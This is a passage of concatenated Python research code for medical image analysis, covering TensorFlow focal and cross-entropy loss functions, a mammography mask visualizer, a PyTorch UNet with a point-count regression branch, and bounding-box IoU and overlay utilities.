raise ValueError('Unkown loss funciton type {}'.format(type))
cross_entropy_mean = tf.reduce_mean(cross_entropy)
regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
loss_ = tf.add_n([cross_entropy_mean] + regularization_losses)
# tf.summary.scalar('loss', loss_) # add to summary when loss() is called
return loss_
def focal_loss(prediction_tensor, target_tensor, alpha=0.5, gamma_p=2.0, gamma_n=2.0):
"""Compute focal loss for predictions
Multi-labels Focal loss formula:
FL = -alpha * (z-p)^gamma * log(p) -(1-alpha) * p^gamma * log(1-p)
,which alpha = 0.25, gamma = 2, p = sigmoid(x), z = target_tensor.
Ref: https://arxiv.org/pdf/1708.02002.pdf
Args:
prediction_tensor: A float tensor of shape [batch_size, num_anchors,
num_classes] representing the predicted logits for each class
target_tensor: A float tensor of shape [batch_size, num_anchors,
num_classes] representing one-hot encoded classification targets
alpha: A scalar tensor for focal loss alpha hyper-parameter
gamma: A scalar tensor for focal loss gamma hyper-parameter
Returns:
loss: A (scalar) tensor representing the value of the loss function
"""
sigmoid_p = tf.nn.sigmoid(prediction_tensor)
zeros = array_ops.zeros_like(sigmoid_p, dtype=sigmoid_p.dtype)
# when target_tensor == 1, pos_p_sub = 1 - sigmoid_p
pos_p_sub = array_ops.where(target_tensor >= sigmoid_p, target_tensor - sigmoid_p, zeros)
# when target_tensor == 0, neg_p_sub = sigmoid_p
neg_p_sub = array_ops.where(target_tensor > zeros, zeros, sigmoid_p)
per_entry_cross_ent = - alpha * (pos_p_sub ** gamma_p) * tf.log(tf.clip_by_value(sigmoid_p, 1e-8, 1.0)) \
- (1 - alpha) * (neg_p_sub ** gamma_n) * tf.log(tf.clip_by_value(1.0 - sigmoid_p, 1e-8, 1.0))
return per_entry_cross_ent
def bounded_sigmoid_cross_entropy_with_logits(
labels=None,
logits=None,
epsilon=0.0,
name=None):
"""Computes sigmoid cross entropy given `logits` with a `bound` (b) away from 0 and 1 when computing log(x).
Modified based on tf.nn.sigmoid_cross_entropy_with_logits()
For brevity, let `x = logits`, `z = labels`. The logistic loss is
z * -log(b + sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x) + b)
= z * -log(1 / (1 + exp(-x))) + (1 - z) * -log(exp(-x) / (1 + exp(-x)))
= z * log(1 + exp(-x)) + (1 - z) * (-log(exp(-x)) + log(1 + exp(-x)))
= z * log(1 + exp(-x)) + (1 - z) * (x + log(1 + exp(-x))
= (1 - z) * x + log(1 + exp(-x))
= x - x * z + log(1 + exp(-x))
For x < 0, to avoid overflow in exp(-x), we reformulate the above
x - x * z + log(1 + exp(-x))
= log(exp(x)) - x * z + log(1 + exp(-x))
= - x * z + log(1 + exp(x))
Hence, to ensure stability and avoid overflow, the implementation uses this
equivalent formulation
max(x, 0) - x * z + log(1 + exp(-abs(x)))
`logits` and `labels` must have the same type and shape.
Args:
labels: A `Tensor` of the same type and shape as `logits`.
logits: A `Tensor` of type `float32` or `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `logits` with the componentwise
logistic losses.
Raises:
ValueError: If `logits` and `labels` do not have the same shape.
"""
with ops.name_scope(name, "logistic_loss", [logits, labels]) as name:
logits = ops.convert_to_tensor(logits, name="logits")
labels = ops.convert_to_tensor(labels, name="labels")
try:
labels.get_shape().merge_with(logits.get_shape())
except ValueError:
raise ValueError("logits and labels must have the same shape (%s vs %s)" %
(logits.get_shape(), labels.get_shape()))
# The logistic loss formula from above is
# x - x * z + log(1 + exp(-x))
# For x < 0, a more numerically stable formula is
# -x * z + log(1 + exp(x))
# Note that these two expressions can be combined into the following:
# max(x, 0) - x * z + log(1 + exp(-abs(x)))
# To allow computing gradients at zero, we define custom versions of max and
# abs functions.
zeros = array_ops.zeros_like(logits, dtype=logits.dtype)
cond = (logits >= zeros)
# relu_logits = array_ops.where(cond, logits, zeros)
neg_abs_logits = array_ops.where(cond, -logits, logits)
out_negative = math_ops.add(
math_ops.log1p(math_ops.exp(neg_abs_logits)),
math_ops.add(
-labels * math_ops.log(math_ops.add(epsilon, math_ops.exp(neg_abs_logits))),
-(1 - labels) * math_ops.log1p(epsilon * math_ops.exp(neg_abs_logits))
)
)
out_positive = math_ops.add(
math_ops.log1p(math_ops.exp(neg_abs_logits)),
math_ops.add(
-labels * math_ops.log1p(epsilon * math_ops.exp(neg_abs_logits)),
-(1 - labels) * math_ops.log(math_ops.add(epsilon, math_ops.exp(neg_abs_logits)))
)
)
return array_ops.where(cond, out_positive, out_negative)
def nan_guard(x):
"""Replace NaN with 0
Args:
x: a Tensor
Returns:
A Tensor, replaced with 0 if NaN
"""
return tf.cond(tf.is_nan(x),
lambda: tf.zeros_like(x),
lambda: x)
def none_guard(x):
"""Replace None with a constant Tensor 0
Args:
x: a Tensor
Returns:
A Tensor, replaced with 0 if NaN
"""
return tf.cond(lambda: (x is None),
lambda: tf.constant(0),
lambda: x)
<file_sep>"""This file contains utility functions used for mask annotation visualization"""
import os
import numpy as np
import argparse
from skimage import measure
import glob2
from tqdm import tqdm
import matplotlib.pylab as plt
import sys
sys.path.append('/data/SigmaPy/projects/mammo_seg/mask_rcnn/')
from projects.mammo_seg.mask_rcnn.mrcnn import visualize
from projects.drutils import fileio
from projects.drutils import roc
class MaskVisualizer(object):
"""Visualize mask annotations"""
def __init__(self, config):
self.output_dir = config['output_dir']
self.class_names = config['class_names']
self.class_name_fn = config['class_name_fn']
self.filter_keys = config['filter_keys']
self.show_orig = config['show_orig']
self.subplot_size = config['subplot_size']
@staticmethod
def get_box_from_mask(mask):
y_range, x_range = np.where(mask > 0)
x_min, x_max = np.min(x_range), np.max(x_range)
y_min, y_max = np.min(y_range), np.max(y_range)
return y_min, x_min, y_max, x_max
def get_images_and_annotation(self, png_path, mask_path_list, class_names, parse_path_fn):
"""
parse_path_fn: function to parse class_name from path
"""
image = plt.imread(png_path, -1)
image_3ch = np.dstack([image] * 3)
masks = []
boxes = []
class_ids = []
if type(mask_path_list) == str:
mask_path_list = [mask_path_list]
if mask_path_list:
for mask_path in mask_path_list:
mask = plt.imread(mask_path, -1).astype(np.bool)
# connected component analysis
labeled_mask_array = measure.label(mask, connectivity=2)
for i in range(np.max(labeled_mask_array)):
mask = (labeled_mask_array == i + 1)
masks.append(mask)
box = self.get_box_from_mask(mask)
boxes.append(box)
class_name = parse_path_fn(mask_path)
class_id = class_names.tolist().index(class_name)
class_ids.append(class_id)
masks = np.dstack(masks)
masks = np.array(masks)
boxes = np.array(boxes)
class_ids = np.array(class_ids)
return image_3ch, boxes, masks, class_ids
@staticmethod
def visualize_multiple_gt(image_3ch, boxes_dict, masks_dict, class_ids_dict, class_names, key,
fig_dir=None,
show_orig=False,
subplot_size=(16, 16)):
assert set(boxes_dict.keys()) == set(masks_dict.keys()) == set(class_ids_dict.keys())
n_annotation_series = len(boxes_dict.keys())
if show_orig:
# show original image without annotation
axes = roc.get_ax(1, n_annotation_series + 1, size=subplot_size)
ax, axes = axes[0], axes[1:]
empty_array = np.array([])
visualize.display_instances(image=image_3ch,
boxes=empty_array,
masks=empty_array,
class_ids=empty_array,
class_names=class_names,
show_mask=False,
show_bbox=False,
ax=ax,
title='orig image',
verbose=False)
else:
axes = roc.get_ax(1, n_annotation_series)
series_keys = boxes_dict.keys()
assert len(axes) == len(series_keys)
for idx, (ax, series_key) in enumerate(zip(axes, series_keys)):
# Display GT bbox and mask
visualize.display_instances(image=image_3ch,
boxes=boxes_dict[series_key],
masks=masks_dict[series_key],
class_ids=class_ids_dict[series_key],
class_names=class_names,
ax=ax,
title=series_key,
verbose=False)
# Save to model log dir
fig_dir = fig_dir or '/tmp/tmp/'
fileio.maybe_make_new_dir(fig_dir)
fig_path = os.path.join(fig_dir, 'gt_{}.png'.format(key))
plt.savefig(fig_path, bbox_inches='tight')
plt.close('all')
def _get_keys(self, png_dict, mask_dict):
mask_dict_keys = set()
for annotation_series in mask_dict.keys():
mask_dict_keys |= set(mask_dict[annotation_series].keys())
keys = list(set(mask_dict_keys) & set(png_dict.keys()))
if self.filter_keys is not None:
keys = list(set(keys) & set(self.filter_keys))
keys = sorted(keys)
return keys
def _get_dicts(self, png_dict, mask_dict, key):
# populate boxes_dict, masks_dict, class_id_dict
boxes_dict = {}
masks_dict = {}
class_ids_dict = {}
for data_series_key in list(mask_dict.keys())[:]:
png_path = png_dict[key]
mask_path_list = mask_dict[data_series_key].get(key, [])
(image_3ch,
boxes_dict[data_series_key],
masks_dict[data_series_key],
class_ids_dict[data_series_key]) = self.get_images_and_annotation(
png_path, mask_path_list, self.class_names, parse_path_fn=self.class_name_fn)
return image_3ch, boxes_dict, masks_dict, class_ids_dict
def process(self, png_dict, mask_dict):
# batch generating stack images
keys = self._get_keys(png_dict, mask_dict)
for key in tqdm(keys[:]):
# populate boxes_dict, masks_dict, class_id_dict
image_3ch, boxes_dict, masks_dict, class_ids_dict = self._get_dicts(png_dict, mask_dict, key)
# visualize
self.visualize_multiple_gt(image_3ch, boxes_dict, masks_dict, class_ids_dict, self.class_names, key,
fig_dir=self.output_dir,
show_orig=self.show_orig,
subplot_size=self.subplot_size)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--test', action='store_true')
args = parser.parse_args()
if args.test:
png_search_path = '/data/log/test/AllPNG/**/*png'
mask_search_path1 = '/data/log/mammo/calc_cluster/above_100/**/*png'
output_dir = '/data/log/test/'
filter_txt = None
dir_key_fn = lambda x: '-'.join(x.split(os.sep)[-3:-1])
file_key_fn = lambda x: os.path.basename(x).split('.')[0].split('_')[0]
mask_dict1 = {file_key_fn(x): x for x in glob2.glob(mask_search_path1)}
mask_dict = {'combined': mask_dict1, 'combined2': mask_dict1}
png_dict = {file_key_fn(x): x for x in glob2.glob(png_search_path)}
if filter_txt is not None:
filter_keys = [file_key_fn(x) for x in fileio.read_list_from_txt(filter_txt)]
else:
filter_keys = None
config = {}
config['output_dir'] = output_dir
config['class_name_fn'] = lambda x: 'mass'
config['class_names'] = np.array(['mass'])
config['key_fn'] = lambda x: os.path.basename(x).split('.')[0].split('_')[0]
config['png_search_path'] = png_search_path
config['filter_keys'] = filter_keys
config['show_orig'] = True
config['subplot_size'] = (20, 30)
visualizer = MaskVisualizer(config=config)
visualizer.process(png_dict, mask_dict)<file_sep>__copyright__ = \
"""
Copyright ©right © (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
__license__ = "CC BY-NC-SA 4.0"
__authors__ = "<NAME>, <NAME>, <NAME>, <NAME>"
__version__ = "1.5.1"
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from .unet_parts import *
class UNet(nn.Module):
def __init__(self, n_channels, n_classes,
height, width,
known_n_points=None,
device=torch.device('cuda')):
super(UNet, self).__init__()
self.device = device
# With this network depth, there is a minimum image size
if height < 256 or width < 256:
raise ValueError('Minimum input image size is 256x256, got {}x{}'.\
format(height, width))
self.inc = inconv(n_channels, 64)
self.down1 = down(64, 128)
self.down2 = down(128, 256)
self.down3 = down(256, 512)
self.down4 = down(512, 512)
self.down5 = down(512, 512)
self.down6 = down(512, 512)
self.down7 = down(512, 512)
self.down8 = down(512, 512, normaliz=False)
self.up1 = up(1024, 512)
self.up2 = up(1024, 512)
self.up3 = up(1024, 512)
self.up4 = up(1024, 512)
self.up5 = up(1024, 256)
self.up6 = up(512, 128)
self.up7 = up(256, 64)
self.up8 = up(128, 64, activ=False)
self.outc = outconv(64, n_classes)
self.out_nonlin = nn.Sigmoid() # to solve the predict map wired problem @ 20190924 Xing
self.known_n_points = known_n_points
if known_n_points is None:
self.branch_1 = nn.Sequential(nn.Linear(512, 64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
self.branch_2 = nn.Sequential(nn.Linear(256*256, 64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
self.regressor = nn.Sequential(nn.Linear(64 + 64, 1),
nn.ReLU())
# This layer is not connected anywhere
# It is only here for backward compatibility
self.lin = nn.Linear(1, 1, bias=False)
def forward(self, x):
batch_size = x.shape[0]
print(batch_size)
x1 = self.inc(x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
x5 = self.down4(x4)
x6 = self.down5(x5)
x7 = self.down6(x6)
x8 = self.down7(x7)
x9 = self.down8(x8)
x = self.up1(x9, x8)
x = self.up2(x, x7)
x = self.up3(x, x6)
x = self.up4(x, x5)
x = self.up5(x, x4)
x = self.up6(x, x3)
x = self.up7(x, x2)
x = self.up8(x, x1)
x= self.outc(x)
x = self.out_nonlin(x) # do not use the sigmoid @20190924 by Xing
# Reshape Bx1xHxW -> BxHxW
# because probability map is real-valued by definition
x = x.squeeze(1)
# x_map = x_map.squeeze(1)
# print(x_map,x)
if self.known_n_points is None:
x9_flat = x9.view(batch_size, -1)
x_flat = x.view(batch_size, -1)
print(x9_flat.shape)
x10_flat = self.branch_1(x9_flat)
x_flat = self.branch_2(x_flat)
regression_features = torch.cat((x_flat, x10_flat), dim=1)
regression = self.regressor(regression_features)
return x, regression
else:
n_pts = torch.tensor([self.known_n_points]*batch_size,
dtype=torch.get_default_dtype())
n_pts = n_pts.to(self.device)
return x, n_pts
# summ = torch.sum(x)
# count = self.lin(summ)
# count = torch.abs(count)
# if self.known_n_points is not None:
# count = Variable(torch.cuda.FloatTensor([self.known_n_points]))
# return x, count
"""
Copyright ©right © (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
<file_sep>"""This file contains utility functions used for bbox"""
import logging
import matplotlib.pylab as plt
import numpy as np
import os
import cv2
from tqdm import tqdm
from skimage import measure
# import matplotlib
# matplotlib.rcParams['figure.dpi'] = 150
from projects.drutils import fileio
# from projects.drutils import patch #when doing froc in object detector
from projects.drutils import augmentation
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
def calc_intersection(bbox_1, bbox_2):
"""Calculate the IOU (Intersection Over Union) given two set of bbox coordinates
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
bbox_1: coordinates of bbox1
bbox_2: coordinates of bbox2
Returns:
x_intersection: the intersected x length
y_intersection: the intersected y length
"""
assert len(bbox_1) == len(bbox_2)
if len(bbox_1) == 4:
ymin, xmin, ymax, xmax = bbox_1
ymin_2, xmin_2, ymax_2, xmax_2 = bbox_2
assert ymax >= ymin and ymax_2 >= ymin_2 and xmax >= xmin and xmax_2 >= xmin_2, 'Please check coordinate input!'
x_intersection = max(min(xmax, xmax_2) - max(xmin, xmin_2), 0)
y_intersection = max(min(ymax, ymax_2) - max(ymin, ymin_2), 0)
return (x_intersection, y_intersection)
elif len(bbox_1) == 2:
xmin, xmax = bbox_1
xmin_2, xmax_2 = bbox_2
assert xmax >= xmin and xmax_2 >= xmin_2, 'Please check coordinate input!'
x_intersection = max(min(xmax, xmax_2) - max(xmin, xmin_2), 0)
return x_intersection
else:
raise ValueError('Input bbox size must be 2 or 4.')
def calc_iou_1d(bbox_1, bbox_2):
"""Calculate the 1-dimensional IOU (Intersection Over Union) given two set of bbox coordinates
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
bbox_1: coordinates of bbox1
bbox_2: coordinates of bbox2
Returns:
iou: the intersection over union
"""
xmin, xmax = bbox_1
xmin_2, xmax_2 = bbox_2
assert xmax >= xmin and xmax_2 >= xmin_2, 'Please check coordinate input!'
x_intersection = calc_intersection(bbox_1, bbox_2)
area_intersection = x_intersection
area_1 = xmax - xmin
area_2 = xmax_2 - xmin_2
area_union = area_1 + area_2 - area_intersection
if area_union == 0:
return 0
iou = area_intersection / area_union
return iou
def calc_iou(bbox_1, bbox_2):
"""Calculate the IOU (Intersection Over Union) given two set of bbox coordinates
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
bbox_1: coordinates of bbox1
bbox_2: coordinates of bbox2
Returns:
iou: the intersection over union
"""
ymin, xmin, ymax, xmax = bbox_1
ymin_2, xmin_2, ymax_2, xmax_2 = bbox_2
assert ymax > ymin and ymax_2 > ymin_2 and xmax > xmin and xmax_2 > xmin_2, 'Please check coordinate input!'
x_intersection, y_intersection = calc_intersection(bbox_1, bbox_2)
area_intersection = x_intersection * y_intersection
area_1 = (xmax - xmin) * (ymax - ymin)
area_2 = (xmax_2 - xmin_2) * (ymax_2 - ymin_2)
area_union = area_1 + area_2 - area_intersection
iou = area_intersection / area_union
return iou
def calc_avg_iou(predictions, labels):
"""Compute average bbox IOU over a number of batches
Args:
predictions: Predictions matrix [num_batches, batch_size, 4 or 2]
labels: Labels matrix [num_batches, batch_size, 4 or 2]
Returns:
average IOU value
"""
num_batches, batch_size, num_coordinates = predictions.shape
assert num_coordinates == 4 or num_coordinates == 2
iou_per_sample = np.zeros((num_batches, batch_size))
for batch_id in range(num_batches):
for image_id in range(batch_size):
pred_array = np.array(predictions[batch_id, image_id, :])
label_array = np.array(labels[batch_id, image_id, :])
if num_coordinates == 4:
iou_per_sample[batch_id, image_id] = calc_iou(pred_array, label_array)
elif num_coordinates == 2:
iou_per_sample[batch_id, image_id] = calc_iou_1d(pred_array, label_array)
return np.mean(iou_per_sample)
def calc_ios(bbox_1, bbox_2):
"""Calculate intersection over small ratio
This is a variant of more commonly used IoU (intersection over union) metric
All coordinates are in the order of (ymin, xmin, ymax, xmax)
Args:
bbox_1:
bbox_2:
Returns:
"""
def cal_area(bbox):
# calculate the area for a bbox in format (y_min, x_min, y_max, x_max)
return max(bbox[2] - bbox[0], 0) * max(bbox[3] - bbox[1], 0)
ymin_1, xmin_1, ymax_1, xmax_1 = bbox_1
ymin_2, xmin_2, ymax_2, xmax_2 = bbox_2
x_min = max(xmin_1, xmin_2)
y_min = max(ymin_1, ymin_2)
x_max = min(xmax_1, xmax_2)
y_max = min(ymax_1, ymax_2)
area_intersection = cal_area([y_min, x_min, y_max, x_max])
area_small = min(cal_area(bbox_1), cal_area(bbox_2))
ios = area_intersection / area_small
return ios
def is_overlapped(pred_bbox, gt_bbox,
overlap_method='gt_center_in_pred',
iou_threshold=0, relative_lateral_threshold=0.9):
"""To tell if there is overlap between perd_bbox and gt_bbox
TODO: 3D version in evaluation tools sigmaLU
TODO: switching between 2D/3D based on the input shape
TODO: add assertion of cases tested
All coordinates are in the of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
pred_bbox: four predicted coordinates
gt_bbox: four GT coordinates
overlap_method: defaults to `gt_center_in_pred`, could be
gt_center_in_pred:
pred_center_in_gt:
iou:
relative_lateral_overlap:
Return:
is_overlapped: True if is_overlapped, False otherwise
"""
ymin, xmin, ymax, xmax = pred_bbox
gt_ymin, gt_xmin, gt_ymax, gt_xmax = gt_bbox
xcenter = (xmin + xmax) // 2
ycenter = (ymin + ymax) // 2
gt_xcenter = (gt_xmin + gt_xmax) // 2
gt_ycenter = (gt_ymin + gt_ymax) // 2
if overlap_method == 'gt_center_in_pred':
is_overlapped = (xmin <= gt_xcenter <= xmax and ymin <= gt_ycenter <= ymax)
elif overlap_method == 'pred_center_in_gt':
is_overlapped = (gt_xmin <= xcenter <= gt_xmax and gt_ymin <= ycenter <= gt_ymax)
elif overlap_method == 'either_center_in_other':
is_overlapped = ((xmin <= gt_xcenter <= xmax and ymin <= gt_ycenter <= ymax) or
(gt_xmin <= xcenter <= gt_xmax and gt_ymin <= ycenter <= gt_ymax))
elif overlap_method == 'both_center_in_other':
is_overlapped = ((xmin <= gt_xcenter <= xmax and ymin <= gt_ycenter <= ymax) and
(gt_xmin <= xcenter <= gt_xmax and gt_ymin <= ycenter <= gt_ymax))
elif overlap_method == 'iou':
is_overlapped = (calc_iou(pred_bbox, gt_bbox) >= iou_threshold)
elif overlap_method == 'relative_lateral_overlap':
x_intersection, y_intersection = calc_intersection(pred_bbox, gt_bbox)
is_overlapped = (x_intersection / min(xmax - xmin, gt_xmax - gt_xmin) > relative_lateral_threshold) and (
y_intersection / min(ymax - ymin, gt_ymax - gt_ymin) > relative_lateral_threshold)
else:
raise ValueError('Unknown overlap_method {}'.format(overlap_method))
return is_overlapped
def is_bbox_list_overlapped(pred_bbox_list, gt_bbox_list, gt_class_list=[], **kwargs):
"""Check if the input bb overlaps with the list of groundtruth (GT) bbox.
Args:
pred_bbox_list:
gt_bbox_list:
gt_class_list:
Return:
is_pred_bbox_correct_list: a list of set containing the index of overlapped GT bbox
is_gt_bbox_covered_list: a list of set containing the index of overlapped pred bbox
"""
is_pred_bbox_correct_list = np.array([set() for _ in range(len(pred_bbox_list))])
is_gt_bbox_covered_list = np.array([set() for _ in range(len(gt_bbox_list))])
if not gt_class_list:
gt_class_list = [-1 for _ in range(len(gt_bbox_list))]
assert len(gt_class_list) == len(gt_bbox_list)
for idx_gt, (gt_bbox, gt_class) in enumerate(zip(gt_bbox_list, gt_class_list)):
for idx_pred, pred_bbox in enumerate(pred_bbox_list):
if is_overlapped(pred_bbox, gt_bbox, **kwargs):
is_gt_bbox_covered_list[idx_gt].add(idx_pred) # TODO: change this to pred classes
is_pred_bbox_correct_list[idx_pred].add(idx_gt)
# is_pred_bbox_correct_list = is_pred_bbox_correct_list.astype(bool)
# is_gt_bbox_covered_list = is_gt_bbox_covered_list.astype(bool)
return is_pred_bbox_correct_list, is_gt_bbox_covered_list
def draw_bb_and_test(image, rects, label='', color=(0, 255, 0),
line_thickness=2, font_scale=0.5, font_thickness=2):
"""
Draw bounding box and add text to image
Args:
image: input image
rects: bbox coordinates in the order of (x, y, w, h)
label: label text to annotate bbox
color: label color
line_thickness: bbox line thickness
font_scale: label text scale factor
font_thickness: label text thickness
Returns:
image: the modified image
"""
assert len(image.shape) == 3, 'images are expected to have 3 channels'
x, y, w, h = rects
# loop over the cat faces and draw a rectangle surrounding each
cv2.rectangle(image, (x, y), (x + w, y + h), color, line_thickness)
cv2.putText(image, "{}".format(label), (x, y - 10),
cv2.FONT_HERSHEY_SIMPLEX, font_scale, color, font_thickness)
return image
def overlay_bbox_on_grayscale_image(image, rects, label='', color=(0, 255, 0), order='xywh', **kwargs):
"""
Convert grayscale image to RGB and then overlay bbox
Args:
image: grayscale image
rects: bbox coordinates in the order of (x, y, w, h)
order: order of bbox, 'xywh' or 'yminxmin'
Return:
image: the overlaid image with num_channels
"""
line_thickness = kwargs.get('line_thickness', 5)
font_scale = kwargs.get('font_scale', 2)
font_thickness = kwargs.get('font_thickness', 5)
if len(image.shape) == 2:
#image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)
image = np.dstack([image] * 3)
assert len(image.shape) == 3, 'image must have 3 channels'
assert len(color) == 3, 'color must have 3 channels'
if order == 'yminxmin':
rects = convert_bbox_yminxmin_to_xywh(rects)
# Draw bbox and annotation
image = draw_bb_and_test(image, rects=rects,
label=label, color=color,
line_thickness=line_thickness,
font_scale=font_scale,
font_thickness=font_thickness)
return image
def overlay_bbox_list_on_image(image, rects_list, label_list=[], color=(0, 255, 0), order='yminxmin', **kwargs):
"""Overlay a list of bboxes on top of an image
Args:
image:
rects_list:
label_list:
color:
Returns:
image: rgb image with bbox overlay
"""
n_bbox = len(rects_list)
if len(label_list) == 0:
label_list = ['' for _ in range(n_bbox)]
elif len(label_list) == 1:
label = label_list[0]
label_list = [label for _ in range(n_bbox)]
else:
assert len(rects_list) == len(label_list), 'number of labels should agree with number of bboxes!'
if len(image.shape) == 2:
image = np.dstack([image] * 3)
for idx, (rects, label) in enumerate(zip(rects_list, label_list)):
if not rects:
continue
image = overlay_bbox_on_grayscale_image(image, rects, label=label, color=color, order=order, **kwargs)
return image
def create_mask_with_bbox_list(image, rects_list):
"""Create binary mask array with bbox list
This function fills the inside of a bbox.
It is different from overlay_bbox_list_on_image which only shows the edge of the bbox
Args:
image: numpy array of the canvas
rects_list: list of int in the order of (x, y, w, h)
"""
for x, y, w, h in rects_list:
# loop over the cat faces and draw a rectangle surrounding each
# use thickness = -1 to fill the inside
cv2.rectangle(image, (x, y), (x + w, y + h), color=255, thickness=-1)
return image
def show_bbox(bbox_dict, raw_image_path_dict, image_pred_path_dict=None, n_demo=0, output_dir='', gt_only=False):
"""Overlay bbox coordinate to original image and show GT and pred side by side.
Prediction overlay uses prediction probability map if image_pred_path_dict is not None, otherwise use raw image
Args:
bbox_dict: a dict with image name as key. Each key corresponds to another dict with the following keys
'pred_bbox_list': input to is_bbox_list_overlapped()
'gt_bbox_list': input to is_bbox_list_overlapped()
'pred_box_correct': output of is_bbox_list_overlapped()
'gt_box_covered': output of is_bbox_list_overlapped()
raw_image_path_dict: a dict with image name as key. The corresponding value is the path to the raw image to
overlay
image_pred_path_dict: optional, a dict with image name as key. The corresponding value is the path to the pred
results to overlay. Default to None, and if specified, use it to showcase pred result on the RHS of the
stack image
n_demo: number of times to run demo
gt_only: boolean, whether to show gt only (no prediction) <TODO> Not tested yet
Returns:
None
"""
colors = {
"tp": (0, 255, 0), # green
"fp": (255, 0, 0), # blue in BGR
"fn": (0, 0, 255), # red in BGR
}
for idx, key in enumerate(bbox_dict.keys()):
if key.startswith('_'):
continue
pred_bbox_list = bbox_dict[key]['pred_bbox_list']
is_pred_bbox_correct_list = bbox_dict[key]['pred_box_correct']
gt_bbox_list = bbox_dict[key]['gt_bbox_list']
is_gt_bbox_covered_list = bbox_dict[key]['gt_box_covered']
bbox_list_tp = [bbox for bbox, bool in zip(pred_bbox_list, is_pred_bbox_correct_list) if bool]
bbox_list_fp = [bbox for bbox, bool in zip(pred_bbox_list, is_pred_bbox_correct_list) if not bool]
bbox_list_fn = [bbox for bbox, bool in zip(gt_bbox_list, is_gt_bbox_covered_list) if not bool]
bbox_list_tp_gt = [bbox for bbox, bool in zip(gt_bbox_list, is_gt_bbox_covered_list) if bool]
image_path = raw_image_path_dict[key]
image = fileio.load_image_to_array(image_path, np.uint8)
if image_pred_path_dict:
image_pred_path = image_pred_path_dict[key]
# this can be a list of up to 3 elements to populate BGR channels
if isinstance(image_pred_path, (list, tuple)) and len(image_pred_path) > 1:
image_overlay = np.dstack([image] * 3)
for idx_ch, single_pred_path in enumerate(image_pred_path):
logging.debug('assembling channel {}'.format(idx_ch))
image_pred = fileio.load_image_to_array(single_pred_path, np.uint8)
# generate overlay in green channel (low prob in magenta color)
logging.debug('before crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_pred = augmentation.crop_or_pad(image_pred, image.shape)
logging.debug('after crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_proba = np.where(image_pred > 0, image_pred, image) # as a single channel
image_overlay[:, :, idx_ch] = image_proba
image_pred = image_overlay
else:
image_pred = fileio.load_image_to_array(image_pred_path, np.uint8)
# generate overlay in green channel (low prob in magenta color)
logging.debug('before crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_pred = augmentation.crop_or_pad(image_pred, image.shape)
logging.debug('after crop_or_pad {} {}'.format(image_pred.shape, image.shape))
image_proba = np.where(image_pred > 0, image_pred, image) # as a single channel
image_overlay = np.dstack([image, image_proba, image])
image_pred = image_overlay
else:
image_pred = image
image_overlay_pred = overlay_bbox_list_on_image(image_pred, bbox_list_tp, color=colors['tp'])
image_overlay_pred = overlay_bbox_list_on_image(image_overlay_pred, bbox_list_fp, color=colors['fp'])
image_overlay_gt = overlay_bbox_list_on_image(image, bbox_list_tp_gt, color=colors['tp'])
image_overlay_gt = overlay_bbox_list_on_image(image_overlay_gt, bbox_list_fn, color=colors['fn'])
if idx < n_demo:
fig, ax = plt.subplots(1, 2, figsize=(16, 10))
ax = np.atleast_2d(ax)
ax[0, 0].imshow(image_overlay_gt)
ax[0, 1].imshow(image_overlay_pred)
plt.show()
# stack image and image_overlay side by side
# image_rgb = np.dstack([image] * 3)
logging.info('Processing key: {}'.format(key))
if output_dir:
if not gt_only:
image_stack = np.hstack([image_overlay_gt, image_overlay_pred])
else:
image_stack = image_overlay_gt
image_stack_path = os.path.join(output_dir, os.path.basename(image_path))
fileio.maybe_make_new_dir(output_dir)
cv2.imwrite(image_stack_path, image_stack)
else:
logging.warning('No output_dir specified. Skip key: {}'.format(key))
def convert_bbox_xywh_to_yminxmin(cv2_rects):
"""Convert cv2_rects (x, y, w, h) to bbox_coord (ymin, xmin, ymax, xman)
Args:
cv2_rects:
Returns:
bbox_coord
"""
x, y, w, h = cv2_rects
ymin, xmin, ymax, xmax = y, x, y + h, x + w
tf_bbox_coord = (ymin, xmin, ymax, xmax)
return tf_bbox_coord
def convert_bbox_yminxmin_to_xywh(tf_bbox_coord):
"""Convert tf_bbox_coord (ymin, xmin, ymax, xman) to cv2_rects (x, y, w, h)
Args:
tf_bbox_coord:
Returns:
cv2_rects
"""
ymin, xmin, ymax, xmax = tf_bbox_coord
y, x, h, w = ymin, xmin, ymax - ymin, xmax - xmin
cv2_rects = (x, y, w, h)
return cv2_rects
def save_annotated_image(image, filename, label='', newdir=''):
""" Save image to newdir with the same basename in filename """
if newdir:
basename = os.path.basename(filename)
if label:
file, ext = os.path.splitext(basename)
basename = file + '_' + label + ext
newfilename = os.path.join(newdir, basename)
else:
newfilename = filename
dirname = os.path.dirname(newfilename)
fileio.maybe_make_new_dir(dirname)
# print(newfilename)
cv2.imwrite(newfilename, image)
def imshow_patch(image, rects, margin=200, origin='upper'):
"""
Show image patch of interest
Args:
image:
rects:
margin:
origin:
Returns:
image_path:
"""
x, y, w, h = rects
height, width = image.shape[:2]
xmin, xmax = max(0, x-margin), min(x+w+margin, width)
